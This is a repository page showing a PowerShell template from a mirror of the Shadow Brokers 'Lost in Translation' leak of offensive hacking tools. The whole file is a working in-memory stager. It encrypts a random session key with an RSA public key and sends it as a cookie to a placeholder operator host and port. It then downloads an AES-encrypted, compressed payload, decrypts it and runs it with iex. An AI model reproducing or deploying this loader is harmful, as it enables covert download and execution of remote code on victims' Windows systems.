sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/windows/Resources/Ops/Tools/ZiPo/decryptor_downloader.base
Donncha O'Cearbhaill 7f640a83d4 Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 11:45:07 +02:00

46 lines
No EOL
2.1 KiB
Text
Raw Permalink Blame History

[byte[]]$modulus = @(<MODULUS>);
[byte[]]$exponent = @(<EXPONENT>);
[byte[]]$i1 = @(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);
$rng = New-Object System.Security.Cryptography.RNGCryptoServiceProvider;
$rng.getBytes($i1);
$rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider;
$keyobject = New-Object System.Security.Cryptography.RSAParameters;
$keyobject.Modulus = $modulus;
$keyobject.Exponent = $exponent;
$rsa.importparameters($keyobject);
$output = $rsa.encrypt($i1,$False);
$rsa.clear();
$b64output = [Convert]::tobase64string($output);
$wc = New-Object System.Net.Webclient;
$wc.Headers["Cookie"] = $b64output;
$a = $wc.downloadstring('http://<IP>:<PORT>/<FILENAME>');
$encoding = New-Object System.Text.ASCIIEncoding;
$iv = [Convert]::FromBase64String('<IV>');
$data = [Convert]::FromBase64String($a);
$bad_password = [System.BitConverter]::ToString($i1);
$good_password = $bad_password -replace "\-","";
$key = $encoding.GetBytes($good_password);
$sha_sum = New-Object System.Security.Cryptography.Sha1CryptoServiceProvider;
$password = $sha_sum.computehash($key);
[Byte[]] $e = $password[0..15];
$f = New-Object System.Security.Cryptography.RijndaelManaged;
$f.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;
$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
[Byte[]] $h = New-Object Byte[]($data.length);
$g = $f.CreateDecryptor($e, $iv);
$i = New-Object System.IO.MemoryStream($data, $True);
$j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read);
$r = $j.Read($h, 0, $h.Length);
$i.Close();
$j.Close();
$f.Clear();
$mz = New-Object System.IO.MemoryStream(,$h);
$mz.readbyte() | out-null;
$mz.readbyte() | out-null;
$zip = New-Object IO.Compression.DeflateStream($mz, [System.IO.Compression.CompressionMode]::Decompress);
$sw = New-Object IO.StreamReader($zip);
$uncompressed_data = $sw.Readtoend();
$sw.Close();
$zip.close();
$mz.close();
iex $uncompressed_data;
Reference in a new issue View git blame Copy permalink